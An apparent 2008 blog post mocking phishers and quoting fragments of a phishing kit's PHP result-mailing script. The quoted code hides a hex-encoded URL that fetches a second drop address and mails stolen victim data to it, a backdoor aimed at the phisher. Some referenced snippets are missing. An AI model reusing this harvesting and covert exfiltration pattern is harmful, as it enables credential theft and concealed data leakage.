Sometimes spammers / scammers are so stu ... / 2008-06-04

2008-06-04 Sometimes spammers / scammers are so stu ... 11 years ago
Sometimes spammers / scammers are so stupid it is amusing again. I just received several mails with the php-source for the result-collecting and mailing script for the phishing site. Interesting code snippets:
But, the scammer gets scammed too. Look at this code snippet:

Takes a bit of decoding, but it seems copies are sent to
The same spammer also mailed a different script with the same function. This script is clear on where to put the dropbox address:
        //This is your email
		$to = "" ; // Write your email
But in the next lines...
/* EnD Configuration */
$victimIP = pack("H*", "687474703a2f2f667265657363616d732e33782e726f2f656d61696c2e706870");
$DetailsIP = file_get_contents($victimIP, "r");
$DetailsIP = pack("H*", $DetailsIP);
$victimip unpacks to so the scammer of the scammer can 'maintain' this and change dropbox if needed. Currently that shows a page which I think says that the page does not exist. The result would be used in the code:
$arr=array($to, $DetailsIP);
foreach ($arr as $to){mail($to, $subj, $msg, $from);}
header("Location: done.html?cmd=_login-run");
You can't trust a good scammer these days, it seems...

Tags: , ,

, reachable as PGP encrypted e-mail preferred.

PGP key 5BA9 368B E6F3 34E4 local copy PGP key 5BA9 368B E6F3 34E4 via keyservers pgp key statistics for 0x5BA9368BE6F334E4 Koos van den Hout
Other webprojects: Camp Wireless, wireless Internet access at campsites, The Virtual Bookcase, book reviews
This page generated in 0.004515 seconds.